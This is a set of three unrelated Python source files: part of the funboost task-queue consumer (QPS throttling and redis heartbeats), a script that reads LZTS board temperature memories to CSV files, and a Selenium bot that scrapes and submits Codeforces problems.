function_only_params = _delete_keys_and_return_new_dict(kw['body'], )
if self.__get_priority_conf(kw, 'do_task_filtering') and self._redis_filter.check_value_exists(
function_only_params): # 对函数的参数进行检查,过滤已经执行过并且成功的任务。
self.logger.warning(f'redis的 [{self._redis_filter_key_name}] 键 中 过滤任务 {kw["body"]}')
self._confirm_consume(kw)
return
publish_time = _get_publish_time(kw['body'])
msg_expire_senconds_priority = self.__get_priority_conf(kw, 'msg_expire_senconds')
if msg_expire_senconds_priority and time.time() - msg_expire_senconds_priority > publish_time:
self.logger.warning(
f'消息发布时戳是 {publish_time} {kw["body"].get("publish_time_format", "")},距离现在 {round(time.time() - publish_time, 4)} 秒 ,'
f'超过了指定的 {msg_expire_senconds_priority} 秒,丢弃任务')
self._confirm_consume(kw)
return 0
msg_eta = self.__get_priority_conf(kw, 'eta')
msg_countdown = self.__get_priority_conf(kw, 'countdown')
misfire_grace_time = self.__get_priority_conf(kw, 'misfire_grace_time')
run_date = None
# print(kw)
if msg_countdown:
run_date = time_util.DatetimeConverter(kw['body']['extra']['publish_time']).datetime_obj + datetime.timedelta(seconds=msg_countdown)
if msg_eta:
run_date = time_util.DatetimeConverter(msg_eta).datetime_obj
# print(run_date,time_util.DatetimeConverter().datetime_obj)
# print(run_date.timestamp(),time_util.DatetimeConverter().datetime_obj.timestamp())
# print(self.concurrent_pool)
if run_date:
# print(repr(run_date),repr(datetime.datetime.now(tz=pytz.timezone(frame_config.TIMEZONE))))
self._delay_task_scheduler.add_job(self.concurrent_pool.submit, 'date', run_date=run_date, args=(self._run,), kwargs={'kw': kw},
misfire_grace_time=misfire_grace_time)
else:
self.concurrent_pool.submit(self._run, kw)
if self._is_using_distributed_frequency_control: # 如果是需要分布式控频。
active_num = self._distributed_consumer_statistics.active_consumer_num
self.__frequency_control(self._qps / active_num, self._msg_schedule_time_intercal * active_num)
else:
self.__frequency_control(self._qps, self._msg_schedule_time_intercal)
def __frequency_control(self, qpsx, msg_schedule_time_intercalx):
# 以下是消费函数qps控制代码。无论是单个消费者空频还是分布式消费控频,都是基于直接计算的,没有依赖redis inrc计数,使得控频性能好。
if qpsx == 0: # 不需要控频的时候,就不需要休眠。
return
if qpsx <= 5:
""" 原来的简单版 """
time.sleep(msg_schedule_time_intercalx)
elif 5 < qpsx <= 20:
""" 改进的控频版,防止消息队列中间件网络波动,例如1000qps使用redis,不能每次间隔1毫秒取下一条消息,
如果取某条消息有消息超过了1毫秒,后面不能匀速间隔1毫秒获取,time.sleep不能休眠一个负数来让时光倒流"""
time_sleep_for_qps_control = max((msg_schedule_time_intercalx - (time.time() - self._last_submit_task_timestamp)) * 0.99, 10 ** -3)
# print(time.time() - self._last_submit_task_timestamp)
# print(time_sleep_for_qps_control)
time.sleep(time_sleep_for_qps_control)
self._last_submit_task_timestamp = time.time()
else:
"""基于当前消费者计数的控频,qps很大时候需要使用这种"""
if time.time() - self._last_start_count_qps_timestamp > 1:
self._has_execute_times_in_recent_second = 1
self._last_start_count_qps_timestamp = time.time()
else:
self._has_execute_times_in_recent_second += 1
# print(self._has_execute_times_in_recent_second)
if self._has_execute_times_in_recent_second >= qpsx:
time.sleep((1 - (time.time() - self._last_start_count_qps_timestamp)) * 1)
@decorators.FunctionResultCacher.cached_function_result_for_a_time(120)
def _judge_is_daylight(self):
if self._is_do_not_run_by_specify_time_effect and (
self._do_not_run_by_specify_time[0] < time_util.DatetimeConverter().time_str < self._do_not_run_by_specify_time[1]):
self.logger.warning(
f'现在时间是 {time_util.DatetimeConverter()} ,现在时间是在 {self._do_not_run_by_specify_time} 之间,不运行')
return True
def wait_for_possible_has_finish_all_tasks(self, minutes: int = 3):
"""
判断队列所有任务是否消费完成了。
由于是异步消费,和存在队列一边被消费,一边在推送,或者还有结尾少量任务还在确认消费者实际还没彻底运行完成。 但有时候需要判断 所有任务,务是否完成,提供一个不精确的判断,要搞清楚原因和场景后再慎用。
一般是和celery一样,是永久运行的后台任务,永远无限死循环去任务执行任务,但有的人有判断是否执行完成的需求。
:param minutes: 消费者连续多少分钟没执行任务任务 并且 消息队列中间件中没有,就判断为消费完成,为了防止是长耗时任务,一般判断完成是真正提供的minutes的2个周期时间。
:return:
"""
if minutes <= 1:
raise ValueError('疑似完成任务,判断时间最少需要设置为3分钟内,最好是是10分钟')
no_task_time = 0
while 1:
# noinspection PyBroadException
message_count = self._msg_num_in_broker
# print(message_count,self._last_execute_task_time,time.time() - self._last_execute_task_time)
if message_count == 0 and self._last_execute_task_time != 0 and (time.time() - self._last_execute_task_time) > minutes * 60:
no_task_time += 30
else:
no_task_time = 0
time.sleep(30)
if no_task_time > minutes * 60:
break
def clear_filter_tasks(self):
RedisMixin().redis_db_frame.delete(self._redis_filter_key_name)
self.logger.warning(f'清空 {self._redis_filter_key_name} 键的任务过滤')
def __str__(self):
return f'队列为 {self.queue_name} 函数为 {self.consuming_function} 的消费者'
def wait_for_possible_has_finish_all_tasks_by_conusmer_list(consumer_list: typing.List[AbstractConsumer], minutes: int = 3):
    """
    Heuristically wait until every consumer in *consumer_list* appears to have finished
    all of its tasks, checking them all concurrently.
    Because consumption is asynchronous — queues may be drained while still being
    published to, and trailing tasks may be running but not yet confirmed — this is an
    imprecise judgement; understand the caveats before relying on it. Consumers normally
    run as permanent background loops (like celery), but some users need a completion check.
    :param consumer_list: the consumers to wait on.
    :param minutes: per-consumer idle threshold — minutes with no executed task and an
           empty broker queue before that consumer counts as finished; to guard against
           long-running tasks this effectively takes about two such periods.
    :return:
    """
    with BoundedThreadPoolExecutor(len(consumer_list)) as pool:
        for consumer in consumer_list:
            # BUGFIX: submit the bound method and its argument to the pool instead of
            # calling it inline — the original `pool.submit(consumer.wait...(minutes))`
            # ran each wait serially in this thread and submitted its None result.
            pool.submit(consumer.wait_for_possible_has_finish_all_tasks, minutes)
# noinspection PyProtectedMember
class ConcurrentModeDispatcher(LoggerMixin):
    """Maps a consumer's numeric concurrency mode onto a matching executor
    pool, timeout decorator and scheduling thread/greenlet.

    Mode codes used in the branches below: 1=threading, 2=gevent,
    3=eventlet, 4=asyncio, 5=solo/single-thread (inferred from which pool
    class each branch selects — confirm against the project's mode
    constants).
    """

    def __init__(self, consumerx: AbstractConsumer):
        self.consumer = consumerx
        self._concurrent_mode = self.consumer._concurrent_mode
        # Choose a timeout decorator compatible with the concurrency model:
        # a thread-based timeout would not work under gevent/eventlet monkey
        # patching, so those modes get their own decorators.
        self.timeout_deco = None
        if self._concurrent_mode in (1, 5):
            self.timeout_deco = decorators.timeout
        elif self._concurrent_mode == 2:
            self.timeout_deco = gevent_timeout_deco
        elif self._concurrent_mode == 3:
            self.timeout_deco = evenlet_timeout_deco
        self.logger.warning(f'{self.consumer} 设置并发模式'
                            f'为{ConsumersManager.get_concurrent_name_by_concurrent_mode(self._concurrent_mode)}')

    def check_all_concurrent_mode(self):
        """Reject incompatible concurrency-mode mixes within one interpreter.

        Modes 1/4/5 (threading, asyncio, solo) may coexist; gevent and
        eventlet monkey-patch the interpreter and therefore cannot be mixed
        with anything else.  Records the chosen mode in the process-wide
        ConsumersManager.global_concurrent_mode.
        """
        if ConsumersManager.global_concurrent_mode is not None and self.consumer._concurrent_mode != ConsumersManager.global_concurrent_mode:
            ConsumersManager.show_all_consumer_info()
            # print({self.consumer._concurrent_mode, ConsumersManager.global_concurrent_mode})
            if not {self.consumer._concurrent_mode, ConsumersManager.global_concurrent_mode}.issubset({1, 4, 5}):
                # threading / asyncio / solo can coexist; gevent or eventlet
                # cannot coexist with any other mode because of monkey patching.
                raise ValueError('''由于猴子补丁的原因,同一解释器中不可以设置两种并发类型,请查看显示的所有消费者的信息,
                搜索 concurrent_mode 关键字,确保当前解释器内的所有消费者的并发模式只有一种(或可以共存),
                asyncio threading single_thread 并发模式可以共存,但gevent和threading不可以共存,
                gevent和eventlet不可以共存''')
        ConsumersManager.global_concurrent_mode = self.consumer._concurrent_mode

    def build_pool(self):
        """Create (or reuse) the consumer's executor pool for its mode.

        Returns the pool; an explicitly supplied ``_specify_concurrent_pool``
        always wins over the mode-derived default.
        """
        if self.consumer._concurrent_pool is not None:
            return self.consumer._concurrent_pool
        # The pool classes are duck-typed after ThreadPoolExecutor: identical
        # public method names and semantics, so they are interchangeable here.
        pool_type = None
        if self._concurrent_mode == 1:
            pool_type = CustomThreadPoolExecutor
            # pool_type = BoundedThreadPoolExecutor
        elif self._concurrent_mode == 2:
            pool_type = GeventPoolExecutor
        elif self._concurrent_mode == 3:
            pool_type = CustomEventletPoolExecutor
        elif self._concurrent_mode == 4:
            pool_type = AsyncPoolExecutor
        elif self._concurrent_mode == 5:
            pool_type = SoloExecutor
        if self._concurrent_mode == 4:
            # asyncio pools additionally take the event loop to run on.
            self.consumer._concurrent_pool = self.consumer._specify_concurrent_pool if self.consumer._specify_concurrent_pool is not None else pool_type(
                self.consumer._concurrent_num, loop=self.consumer._specify_async_loop)
        else:
            # print(pool_type)
            self.consumer._concurrent_pool = self.consumer._specify_concurrent_pool if self.consumer._specify_concurrent_pool is not None else pool_type(
                self.consumer._concurrent_num)
        # print(self._concurrent_mode,self.consumer._concurrent_pool)
        return self.consumer._concurrent_pool

    def schedulal_task_with_no_block(self):
        """Start the consumer's scheduling loop without blocking the caller.

        Runs ``_shedual_task`` forever (via keep_circulating(1)) in a thread
        or, for gevent/eventlet modes, a greenlet, and registers the handle
        in ConsumersManager.schedulal_thread_to_be_join for a later join.
        """
        if ConsumersManager.schedual_task_always_use_thread:
            t = Thread(target=self.consumer.keep_circulating(1)(self.consumer._shedual_task))
            ConsumersManager.schedulal_thread_to_be_join.append(t)
            t.start()
        else:
            if self._concurrent_mode in [1, 4, 5]:
                t = Thread(target=self.consumer.keep_circulating(1)(self.consumer._shedual_task))
                ConsumersManager.schedulal_thread_to_be_join.append(t)
                t.start()
            elif self._concurrent_mode == 2:
                g = gevent.spawn(self.consumer.keep_circulating(1)(self.consumer._shedual_task), )
                ConsumersManager.schedulal_thread_to_be_join.append(g)
            elif self._concurrent_mode == 3:
                g = eventlet.spawn(self.consumer.keep_circulating(1)(self.consumer._shedual_task), )
                ConsumersManager.schedulal_thread_to_be_join.append(g)
        # elif self._concurrent_mode == 4:
        #     t = Thread(target=self.consumer.keep_circulating(1)(self.consumer._shedual_task))
        #     ConsumersManager.schedulal_thread_to_be_join.append(t)
        #     t.start()
        # elif self._concurrent_mode ==5:
class DistributedConsumerStatistics(RedisMixin, LoggerMixinDefaultWithFileHandler):
    """Heartbeat bookkeeping for consumers across a distributed deployment.

    Exists so that brokers which merely *simulate* an MQ (e.g. a redis list,
    which implements nothing like AMQP) can still answer "how many live
    consumers does this queue have?".  Two purposes:

    1. Count active consumers for distributed QPS throttling.  Without the
       cluster-wide count, rate limiting is per-process only: starting the
       same script three times with qps=10 would run 30 calls/second instead
       of 10.
    2. Record the ids of all live consumers; an id missing from the set means
       that consumer went offline, so its messages can be redistributed —
       needed for middleware without server-side consume acknowledgement.
    """

    def __init__(self, queue_name: str, consumer_identification: str, consumer_identification_map: dict):
        # Identity of this consumer process (string id + a metadata dict that
        # gets serialized into redis sets).
        self._consumer_identification = consumer_identification
        self._consumer_identification_map = consumer_identification_map
        self._queue_name = queue_name
        # Set of "<id>&&<timestamp>" strings, one per live consumer of the queue.
        self._redis_key_name = f'funboost_hearbeat_queue__str:{queue_name}'
        self.active_consumer_num = 1
        self._last_show_consumer_num_timestamp = 0
        # JSON-dict heartbeat sets, partitioned per queue and per server ip.
        self._queue__consumer_identification_map_key_name = f'funboost_hearbeat_queue__dict:{self._queue_name}'
        self._server__consumer_identification_map_key_name = f'funboost_hearbeat_server__dict:{nb_log_config_default.computer_ip}'

    def run(self):
        """Send one heartbeat now, then keep heartbeating and recounting in
        the background (non-blocking keep_circulating loops)."""
        self.send_heartbeat()
        decorators.keep_circulating(10, block=False)(self.send_heartbeat)()
        # Recount frequently so distributed QPS throttling adapts quickly to
        # consumers joining or leaving.
        decorators.keep_circulating(5, block=False)(self._show_active_consumer_num)()

    def _send_heartbeat_with_dict_value(self, redis_key, ):
        # Heartbeat whose set members are JSON dicts: which consumer processes
        # run on a given machine or for a given queue.
        results = self.redis_db_frame.smembers(redis_key)
        with self.redis_db_frame.pipeline() as p:
            for result in results:
                result_dict = json.loads(result)
                if time.time() - result_dict['hearbeat_timestamp'] > 15 \
                        or self._consumer_identification_map['consumer_uuid'] == result_dict['consumer_uuid']:
                    # Heartbeats fire every 10s; a member not refreshed for 15s
                    # is dead.  Our own stale entry is removed first, then
                    # re-added below with fresh timestamps.
                    p.srem(redis_key, result)
            self._consumer_identification_map['hearbeat_datetime_str'] = time_util.DatetimeConverter().datetime_str
            self._consumer_identification_map['hearbeat_timestamp'] = time.time()
            value = json.dumps(self._consumer_identification_map, sort_keys=True)
            p.sadd(redis_key, value)
            p.execute()

    def send_heartbeat(self):
        """Refresh all three heartbeat sets for this consumer process."""
        # Queue-level heartbeat whose members are plain strings, convenient
        # for use as keys of other redis structures.
        results = self.redis_db_frame.smembers(self._redis_key_name)
        with self.redis_db_frame.pipeline() as p:
            for result in results:
                if time.time() - float(result.decode().split('&&')[-1]) > 15 or \
                        self._consumer_identification == result.decode().split('&&')[0]:
                    # 10s cadence; >15s stale means offline.  Our own old
                    # entry is also removed before re-adding.
                    p.srem(self._redis_key_name, result)
            p.sadd(self._redis_key_name, f'{self._consumer_identification}&&{time.time()}')
            p.execute()
        self._send_heartbeat_with_dict_value(self._queue__consumer_identification_map_key_name)
        self._send_heartbeat_with_dict_value(self._server__consumer_identification_map_key_name)

    def _show_active_consumer_num(self):
        # Set cardinality == number of live consumers (never report 0: this
        # process itself is alive).  Log at most once per minute.
        self.active_consumer_num = self.redis_db_frame.scard(self._redis_key_name) or 1
        if time.time() - self._last_show_consumer_num_timestamp > 60:
            self.logger.info(f'分布式所有环境中使用 {self._queue_name} 队列的,一共有 {self.active_consumer_num} 个消费者')
            self._last_show_consumer_num_timestamp = time.time()

    def get_queue_heartbeat_ids(self, without_time: bool):
        """Return the queue's heartbeat members, optionally stripping the
        '&&<timestamp>' suffix so only the consumer ids remain."""
        if without_time:
            return [idx.decode().split('&&')[0] for idx in self.redis_db_frame.smembers(self._redis_key_name)]
        else:
            return [idx.decode() for idx in self.redis_db_frame.smembers(self._redis_key_name)]
class ActiveCousumerProcessInfoGetter(RedisMixin, LoggerMixinDefaultWithFileHandler):
    """Query live consumer-process information across the distributed deployment.

    The four public methods only see consumers whose @boost decorator was
    created with is_send_consumer_hearbeat_to_redis=True (that is what pushes
    the heartbeats these queries read).  Regardless of which broker the
    consumers actually use, redis must be installed and configured in
    funboost_config.py for these statistics to work.
    """

    def _get_all_hearbeat_info_by_redis_key_name(self, redis_key):
        # If every process on every machine was shut down at once, no survivor
        # is left to prune the heartbeat set, so stale members (older than the
        # 15-second freshness window) are filtered out here as well.
        members = self.redis_db_frame.smembers(redis_key)
        decoded = (json.loads(member) for member in members)
        return [info for info in decoded if time.time() - info['hearbeat_timestamp'] < 15]

    def get_all_hearbeat_info_by_queue_name(self, queue_name) -> typing.List[typing.Dict]:
        """Return the active consumer processes of one queue.

        Each element is a heartbeat dict, e.g.::

            {
                "code_filename": "/codes/funboost/test_frame/my/test_consume.py",
                "computer_ip": "172.16.0.9",
                "computer_name": "VM_0_9_centos",
                "consumer_id": 140477437684048,
                "consumer_uuid": "79473629-b417-4115-b516-4365b3cdf383",
                "consuming_function": "f2",
                "hearbeat_datetime_str": "2021-12-27 19:22:04",
                "hearbeat_timestamp": 1640604124.4643965,
                "process_id": 9665,
                "queue_name": "test_queue72c",
                "start_datetime_str": "2021-12-27 19:21:24",
                "start_timestamp": 1640604084.0780013
            }
        """
        return self._get_all_hearbeat_info_by_redis_key_name(f'funboost_hearbeat_queue__dict:{queue_name}')

    def get_all_hearbeat_info_by_ip(self, ip=None) -> typing.List[typing.Dict]:
        """Return the active consumer processes on one machine.

        With ``ip`` omitted, queries the local machine; otherwise any machine.
        Result format matches get_all_hearbeat_info_by_queue_name.
        """
        target_ip = ip or nb_log_config_default.computer_ip
        return self._get_all_hearbeat_info_by_redis_key_name(f'funboost_hearbeat_server__dict:{target_ip}')

    def _get_all_hearbeat_info_partition_by_redis_key_prefix(self, redis_key_prefix):
        # Scan for all heartbeat keys of this family, then group the fresh
        # (<15s old) heartbeat dicts under the key suffix (queue name or ip).
        matched_keys = self.redis_db_frame.scan(0, f'{redis_key_prefix}*', 10000)[1]
        infos_map = {}
        for raw_key in matched_keys:
            key_str = raw_key.decode()
            partition = key_str.replace(redis_key_prefix, '')
            fresh_infos = []
            for member in self.redis_db_frame.smembers(key_str):
                info_dict = json.loads(member)
                if time.time() - info_dict['hearbeat_timestamp'] < 15:
                    fresh_infos.append(info_dict)
            infos_map[partition] = fresh_infos
        return infos_map

    def get_all_hearbeat_info_partition_by_queue_name(self) -> typing.Dict[typing.AnyStr, typing.List[typing.Dict]]:
        """Return {queue_name: [heartbeat dicts]} for every queue, discovered by
        scanning redis keys — no queue name needs to be passed.  Avoid storing
        many unrelated business keys in the redis db funboost_config.py points at."""
        infos_map = self._get_all_hearbeat_info_partition_by_redis_key_prefix('funboost_hearbeat_queue__dict:')
        self.logger.info(f'获取所有队列对应的活跃消费者进程信息,按队列名划分,结果是 {json.dumps(infos_map, indent=4)}')
        return infos_map

    def get_all_hearbeat_info_partition_by_ip(self) -> typing.Dict[typing.AnyStr, typing.List[typing.Dict]]:
        """Return {machine_ip: [heartbeat dicts]} for every machine, discovered
        by scanning redis keys — no ip needs to be passed.  Avoid storing many
        unrelated business keys in the redis db funboost_config.py points at."""
        infos_map = self._get_all_hearbeat_info_partition_by_redis_key_prefix('funboost_hearbeat_server__dict:')
        self.logger.info(f'获取所有机器ip对应的活跃消费者进程信息,按机器ip划分,结果是 {json.dumps(infos_map, indent=4)}')
        return infos_map
|
lztsReadTempMem.py | #!/usr/bin/env python3
#-----------------------------------------------------------------------------
# Title : ePix 100a board instance
#-----------------------------------------------------------------------------
# File : epix100aDAQ.py evolved from evalBoard.py
# Author : Ryan Herbst, rherbst@slac.stanford.edu
# Modified by: Dionisio Doering
# Created : 2016-09-29
# Last update: 2017-02-01
#-----------------------------------------------------------------------------
# Description:
# Rogue script that reads the LZTS board temperature memories out to CSV
# (header evolved from the ePix 100a board scripts)
#-----------------------------------------------------------------------------
# This file is part of the rogue_example software. It is subject to
# the license terms in the LICENSE.txt file found in the top-level directory
# of this distribution and at:
# https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html.
# No part of the rogue_example software, including this file, may be
# copied, modified, propagated, or distributed except according to the terms
# contained in the LICENSE.txt file.
#-----------------------------------------------------------------------------
import rogue.hardware.pgp
import pyrogue.utilities.prbs
import pyrogue.utilities.fileio
import pyrogue.gui
import surf
import threading
import signal
import atexit
import yaml
import time
import sys
import argparse
import PyQt4.QtGui
import PyQt4.QtCore
import lztsFpga as fpga
import lztsViewer as vi
import operator
#################
# Set the argument parser
parser = argparse.ArgumentParser()
parser.add_argument(
    "--l",
    type = int,
    required = False,
    default = 0,
    help = "PGP lane number",
)
parser.add_argument(
    "--type",
    type = str,
    required = True,
    help = "define the PCIe card type (either pgp-gen3 or datadev-pgp2b)",
)
# Get the arguments
args = parser.parse_args()

# Open the register (VC0) and data (VC1) channels on the selected card type.
if ( args.type == 'pgp-gen3' ):
    pgpVc0 = rogue.hardware.pgp.PgpCard('/dev/pgpcard_0',args.l,0) # Registers for lzts board
    pgpVc1 = rogue.hardware.pgp.PgpCard('/dev/pgpcard_0',args.l,1) # Data for lzts board
    print("")
    print("PGP Card Version: %x" % (pgpVc0.getInfo().version))
elif ( args.type == 'datadev-pgp2b' ):
    #pgpVc0 = rogue.hardware.data.DataCard('/dev/datadev_0',(args.l*32)+0) # Registers for lzts board
    # NOTE(review): the register channel uses (7*32)+args.l while the data and
    # PRBS channels use (args.l*32)+n — inconsistent with the commented-out
    # line above; presumably a deliberate remap for this setup, but confirm.
    pgpVc0 = rogue.hardware.data.DataCard('/dev/datadev_0',(7*32)+args.l) # Registers for lzts board
    pgpVc1 = rogue.hardware.data.DataCard('/dev/datadev_0',(args.l*32)+1) # Data for lzts board
    pgpVc2 = rogue.hardware.data.DataCard('/dev/datadev_0',(args.l*32)+2) # PRBS stream
    #memBase = rogue.hardware.data.DataMap('/dev/datadev_0')
else:
    raise ValueError("Invalid type (%s)" % (args.type) )

# Add data stream to file as channel 1
# File writer
dataWriter = pyrogue.utilities.fileio.StreamWriter(name='dataWriter')
pyrogue.streamConnect(pgpVc1, dataWriter.getChannel(0x1))
## Add pseudoscope to file writer
#pyrogue.streamConnect(pgpVc2, dataWriter.getChannel(0x2))
#pyrogue.streamConnect(pgpVc3, dataWriter.getChannel(0x3))
# Command channel rides on the data VC; register access goes through SRPv3.
cmd = rogue.protocols.srp.Cmd()
pyrogue.streamConnect(cmd, pgpVc1)
# Create and Connect SRP to VC1 to send commands
srp = rogue.protocols.srp.SrpV3()
pyrogue.streamConnectBiDir(pgpVc0,srp)
#############################################
# Microblaze console printout
#############################################
class MbDebug(rogue.interfaces.stream.Slave):
    """Stream slave that dumps incoming Microblaze console frames to stdout
    when enabled."""

    def __init__(self):
        rogue.interfaces.stream.Slave.__init__(self)
        self.enable = False  # flip to True to start printing frames

    def _acceptFrame(self, frame):
        if not self.enable:
            return
        payload = bytearray(frame.getPayload())
        frame.read(payload, 0)
        print('-------- Microblaze Console --------')
        print(payload.decode('utf-8'))
#######################################
# Custom run control
#######################################
class MyRunControl(pyrogue.RunControl):
    """Run controller that fires root.Trigger() at the selected run rate
    on a background thread while runState is 'Running'."""

    def __init__(self,name):
        pyrogue.RunControl.__init__(self,name=name,description='Run Controller LZTS', rates={1:'1 Hz', 10:'10 Hz', 30:'30 Hz'})
        # Background trigger thread; exists only while running.
        self._thread = None

    def _setRunState(self,dev,var,value,changed):
        # Start the trigger loop on Stopped->Running; join it on the way back.
        if changed:
            if self.runState.get(read=False) == 'Running':
                self._thread = threading.Thread(target=self._run)
                self._thread.start()
            else:
                self._thread.join()
                self._thread = None

    def _run(self):
        self.runCount.set(0)
        self._last = int(time.time())
        while (self.runState.value() == 'Running'):
            # Invert the rate enum ({key: label}) to map the label back to its
            # numeric rate, then sleep 1/rate between triggers.
            # NOTE(review): self._runRate is never assigned in this class —
            # presumably set by the pyrogue.RunControl base class; confirm,
            # otherwise this line raises AttributeError.
            delay = 1.0 / ({value: key for key,value in self.runRate.enum.items()}[self._runRate])
            time.sleep(delay)
            self.root.Trigger()
            # NOTE(review): self._runCount is likewise never initialised here
            # (only self.runCount is, above) — looks like a latent bug; verify
            # against the base class before relying on run counting.
            self._runCount += 1
            if self._last != int(time.time()):
                self._last = int(time.time())
                # Publish the counter update at most once per second.
                self.runCount._updated()
##############################
# Set base
##############################
class LztsBoard(pyrogue.Root):
    """pyrogue root for the LZTS board: data writer, FPGA device tree,
    software trigger command and run control; started on construction."""

    def __init__(self, cmd, dataWriter, srp, **kwargs):
        # NOTE(review): **kwargs is accepted but never forwarded to
        # pyrogue.Root.__init__ — any extra keyword is silently ignored.
        pyrogue.Root.__init__(self, name='lztsBoard', description='LZTS Board')
        self.add(dataWriter)
        # Add Devices
        self.add(fpga.Lzts(name='Lzts', offset=0, memBase=srp, hidden=False, enabled=True))

        # Software trigger: sends opcode 0 over the SRP command channel.
        @self.command()
        def Trigger():
            cmd.sendCmd(0, 0)
        self.add(MyRunControl('runControl'))
        #self.add(pyrogue.RunControl(name='runControl', rates={1:'1 Hz', 10:'10 Hz',30:'30 Hz'}, cmd=cmd.sendCmd(0, 0)))
        # Export remote objects
        self.start(pyroGroup='lztsGui')
# Create board.
# FIX: the original bound the instance to the name "LztsBoard", shadowing the
# class defined just above; use a distinct name for the instance.
board = LztsBoard(cmd, dataWriter, srp)

# Enable the devices needed for the temperature-memory readout.
board.Lzts.PwrReg.enable.set(True)
board.Lzts.TempLocMem.enable.set(True)
board.Lzts.TempRemMem.enable.set(True)

# FaultTempPtr points at the most recently written slot of the 256-entry
# circular temperature buffers; start reading one past it (the oldest sample).
memPtr = (board.Lzts.PwrReg.FaultTempPtr.get() + 1) % 256

# Dump both buffers as single-row CSV files, oldest sample first.
# FIX: with-statements guarantee the files are closed even if a register read
# raises (the original left them open on error).
with open('locTemp.csv', 'w') as lf, open('remTemp.csv', 'w') as rf:
    for i in range(256):
        j = (memPtr + i) % 256  # wrap around the circular buffer
        lf.write('%d,' % (board.Lzts.TempLocMem.MEM[j].get()))
        rf.write('%d,' % (board.Lzts.TempRemMem.MEM[j].get()))
    rf.write('\n')
    lf.write('\n')

board.stop()
exit()
bot_codeforces.py | import os
import os.path as pth
import re
import time
from threading import Thread
from selenium.webdriver.common.keys import Keys
from bot_cp import *
class bot_codeforces(bot_cp):
    """Selenium-driven helper that scrapes Codeforces problems, injects their
    sample tests into a source template and submits solutions.

    Relies on names star-imported from bot_cp (get_driver, inject, reference,
    solving, solution_format, interface, ...) — assumed to be defined there;
    confirm against bot_cp.
    """

    def prept(self, prob_code: str, autoload=False):
        """Prepare one problem: scrape its sample I/O and build a source stub.

        :param prob_code: problem index within the contest (e.g. 'a' or 'B').
        :param autoload: when True, immediately load the generated stub.
        """
        driver = get_driver()
        contestname = self.contestname
        driver.get(f'https://codeforces.com/contest/{contestname}/problem/{prob_code.upper()}')
        # Sample inputs and outputs are rendered in <pre> tags, alternating —
        # split below into caught[0::2] (inputs) and caught[1::2] (outputs).
        caught = []
        for element in driver.find_elements_by_tag_name('pre'):
            caught.append(element.text)
        # Load the template and cut out the three autofill regions, keeping
        # only their marker lines; inject() fills them back in afterwards.
        with open(reference, 'r') as f:
            samplecpp: list = f.readlines()
        srcfr, srcto = [idx for idx, line in enumerate(samplecpp) if line.endswith('python-autofill-src>\n')]
        del samplecpp[srcfr + 1:srcto]
        infr, into = [idx for idx, line in enumerate(samplecpp) if line.endswith('python-autofill-in>\n')]
        del samplecpp[infr + 1:into]
        outfr, outto = [idx for idx, line in enumerate(samplecpp) if line.endswith('python-autofill-out>\n')]
        del samplecpp[outfr + 1:outto]
        #
        ins, outs = caught[0::2], caught[1::2]
        file = solution_format.format(prob_code.lower())
        # The first two template lines carry metadata that sub() parses back:
        # line 0 -> "//<file> <contest>", line 1 -> "//<all problem codes>".
        samplecpp[0] = f'//{file} {contestname}\n'
        samplecpp[1] = f'//{" ".join(self.prob_codes)}\n'
        inject(f'{file}', samplecpp, ins, outs, infr, outfr)
        # now preparing the solution
        print(f'task {prob_code} prepared')
        driver.back()
        if autoload:
            self.load(prob_code)

    def sub(self):
        """Submit the current solution and watch its verdict.

        Recovers the task code and contest from the metadata comment lines
        written by prept(), pastes the source into the web editor, submits,
        then polls the status table in a background thread until a terminal
        verdict appears.
        """
        with open(solving, 'r') as f:
            got = f.readlines()
        _ = solution_format.format(r'(\w+)')
        task_code, self.contestname = re.match(fr'//{_} (\w+)', got[0]).groups()
        task_code = task_code.lower()
        self.prob_codes, *_ = re.match("//([\w+ ]+)", got[1]).groups()
        self.prob_codes = self.prob_codes.split()
        driver = get_driver()
        # Retry navigation until we actually land on the submit page
        # (redirects may bounce us elsewhere, e.g. to a login page).
        while driver.current_url != fr'https://codeforces.com/contest/{self.contestname}/submit':
            driver.get(fr'https://codeforces.com/contest/{self.contestname}/submit')
        selection = driver.find_element_by_name('submittedProblemIndex')
        selection.send_keys(task_code)
        toggle_editor = driver.find_element_by_class_name('toggleEditorCheckboxLabel') # only for codeforce, multi-character
        editor = driver.find_element_by_id('sourceCodeTextarea')
        srcfilebrowse_button = driver.find_element_by_name('sourceFile')
        # Keep toggling until the inline editor is actually visible.
        while 'inline-block' not in editor.get_attribute('style'):
            toggle_editor.click()
        # src_file_loc = os.path.abspath(pth.join(os.getcwd(), solving))
        # incl() presumably places the flattened source on the clipboard
        # (defined in bot_cp — confirm); it is then pasted into the editor.
        self.incl()
        editor.send_keys(Keys.CONTROL + 'v')
        # print(f"uploading file {src_file_loc}")
        # srcfilebrowse_button.send_keys(src_file_loc)
        submit = driver.find_element_by_class_name('submit')
        while submit.get_attribute('disabled') == 'disabled':
            print('submit button disabled')
            time.sleep(0.5)
        submit.send_keys(Keys.ENTER)

        def report():
            # Poll the newest status row once per second until the verdict
            # column contains a terminal keyword (accepted/wrong/error/...).
            time.sleep(10)
            while True:
                time.sleep(1)
                driver.refresh()
                table = driver.find_element_by_class_name('status-frame-datatable')
                lastsubmission = table.find_elements_by_tag_name('tr')[1]
                columns = lastsubmission.find_elements_by_tag_name('td')
                columns = [c.text for c in columns]
                print(f'\r{"|".join(columns[3:])}', end='\r')
                verdict = columns[5]
                if any(x in verdict for x in ['Happy', 'ccept', 'ceede', 'rror', 'rong', 'assed']):
                    break
            print('finally: ' + lastsubmission.text)
            driver.get(fr'https://codeforces.com/contest/{self.contestname}/submit')

        self.check_score = Thread(target=report)
        self.check_score.start()
        # While the verdict is being polled, pre-load the next problem (if any).
        if self.prob_codes[-1] != task_code:
            try:
                self.load(self.prob_codes[self.prob_codes.index(task_code) + 1])
            except Exception as e:
                print(f'unable to autoload next, either no more next or problem_code not defined:{e}')
        self.check_score.join()

    def prep(self, contestname):
        """Prepare a whole contest: scrape the problem list, open each problem
        in a background tab and run prept() for every problem code."""
        driver = get_driver()
        self.clr()
        self.contestname = contestname = str(contestname)
        driver.get(f'https://codeforces.com/contest/{contestname}/')
        table = driver.find_element_by_class_name('problems')
        # First row is the table header; each remaining row's first cell links
        # to a problem, and the link text is the problem code (A, B, ...).
        problems = table.find_elements_by_tag_name('tr')[1:]
        problems = [tr.find_element_by_tag_name('td').find_element_by_tag_name('a') for tr in problems]
        self.prob_codes = prob_codes = [x.text.lower() for x in problems]
        # Ctrl+Enter opens each problem in a background tab.
